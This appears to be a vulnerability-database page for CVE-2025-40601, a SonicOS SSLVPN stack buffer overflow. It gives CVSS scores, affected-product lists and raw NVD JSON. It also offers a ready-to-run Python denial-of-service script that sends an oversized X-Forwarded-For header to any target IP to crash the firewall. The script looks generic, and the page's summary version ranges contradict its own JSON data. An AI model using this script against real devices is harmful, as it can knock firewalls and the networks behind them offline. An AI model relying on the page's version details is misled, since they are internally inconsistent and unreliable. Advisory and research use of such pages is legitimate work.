Security Vulnerability Report
中文
CVE-2025-40601 CVSS 7.5 HIGH

CVE-2025-40601

Published: 2025-11-20 15:17:29
Last Modified: 2025-12-12 15:57:37
Source: [email protected]

Description

A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sonicwall:nsa_2700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_3700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_4700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_5700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_6700:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sonicwall:nsa_2800:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_3800:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_4800:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:nsa_5800:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:sonicwall:tz280:-:*:*:*:*:*:*:* - NOT VULNERABLE
SonicWall SonicOS < 7.1.1-7055
SonicWall SonicOS < 7.0.1-5050
SonicWall SonicOS < 6.5.4.4-93n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-40601 PoC - SonicOS SSLVPN Buffer Overflow Note: This PoC is for educational and authorized testing purposes only. """ import socket import sys import struct def create_exploit_payload(): """Generate payload to trigger buffer overflow in SonicOS SSLVPN""" # HTTP GET request with oversized header to trigger overflow payload = b"GET / HTTP/1.1\r\n" payload += b"Host: target\r\n" # Large string to overflow buffer payload += b"X-Forwarded-For: " + b"A" * 8192 + b"\r\n" payload += b"\r\n" return payload def send_exploit(target_ip, target_port=443): """Send exploit payload to target""" try: print(f"[*] Connecting to {target_ip}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print("[*] Sending exploit payload...") sock.send(create_exploit_payload()) print("[*] Payload sent. Waiting for response...") try: response = sock.recv(4096) print(f"[*] Received response: {response[:100]}") except socket.timeout: print("[!] No response received - target may have crashed") sock.close() return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 send_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40601", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:28.570", "lastModified": "2025-12-12T15:57:37.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1.1-7040", "versionEndExcluding": "7.3.1-7013", "matchCriteriaId": "3D8575AA-96A1-4DAD-9098-B3BF9472B40C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsa_2700:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D8B0C7A-FD65-47CA-A625-150A90EFA7A1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsa_3700:-:*:*:*:*:*:*:*", "matchCriteriaId": "A69E000B-5806-46FD-A233-4E2CC9DD38D2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsa_4700:-:*:*:*:*:*:*:*", "matchCriteriaId": "8DF4A322-7CC7-4AB9-B10E-FFF34DF2182D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsa_5700:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C15FED5-C48C-47CF-9645-0563D77883C1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsa_6700:-:*:*:*:*:*:*:*", "matchCriteriaId": "A884B1BB-F201-4C77-9F6E-B8A884DCD4C2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nssp_10700:-:*:*:*:*:*:*:*", "matchCriteriaId": "7C3BA5A3-1160-4793-A8D6-40B9D264BCC4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nssp_11700:-:*:*:*:*:*:*:*", "matchCriteriaId": "6739DEA3-06FF-4FEB-9931-0DB27F63B70E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nssp_13700:-:*:*:*:*:*:*:*", "matchCriteriaId": "0250EDF9-0AEF-4711-8EF6-D447CF48BCAF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nssp_15700:-:*:*:*:*:*:*:*", "matchCriteriaId": "7D6CF3CF-256C-4C04-8BDF-B16398CD0459"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsv270:-:*:*:*:*:*:*:*", "matchCriteriaId": "DACDCE12-74C2-4F3C-8421-9191700514C5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsv470:-:*:*:*:*:*:*:*", "matchCriteriaId": "3AF1ECB1-6257-41E3-A050-6467063F4807"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsv870:-:*:*:*:*:*:*:*", "matchCriteriaId": "0883D805-1BA9-49CE-AEC7-51C9D9A69C5C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz270:-:*:*:*:*:*:*:*", "matchCriteriaId": "70340DD4-687B-402C-85AF-C2B80D0F1600"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz270w:-:*:*:*:*:*:*:*", "matchCriteriaId": "52847BA2-470B-4078-A79B-52095DB9214B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz370:-:*:*:*:*:*:*:*", "matchCriteriaId": "9853AE3A-B0EA-4249-AA7D-1F2051C9BF91"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz370w:-:*:*:*:*:*:*:*", "matchCriteriaId": "4DBDD10C-F89D-4051-BC70-67B41167FF9B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz470:-:*:*:*:*:*:*:*", "matchCriteriaId": "6C23940E-2F9D-447B-A740-42035ED5D400"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz470w:-:*:*:*:*:*:*:*", "matchCriteriaId": "90C790AD-C40E-4527-8F83-D278282A9600"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz570:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7DF76E0-8E3D-4E0D-A3BB-F5AE05A4C7C9"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz570p:-:*:*:*:*:*:*:*", "matchCriteriaId": "352DFCF9-E333-41C0-8033-91265768FD8E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz570w:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C882C38-9DA5-4C03-BB23-AB2B448E3307"}, {"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:tz670:-:*:*:*:*:*:*:*", "matchCriteriaId": "AEEA6065-48D3-4EC7-BD94-CBAE3D1010FF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.3-8011", "matchCriteriaId": "B60197D0-41B7-46DB-B33E-FEE1F1037A8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sonicwall:nsa_2800:-:*:*:*:*:*:*:*", "matchCriteriaId": "559FE8B8-E5E1-4E74-98AF-79AF0ECF9064"} ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.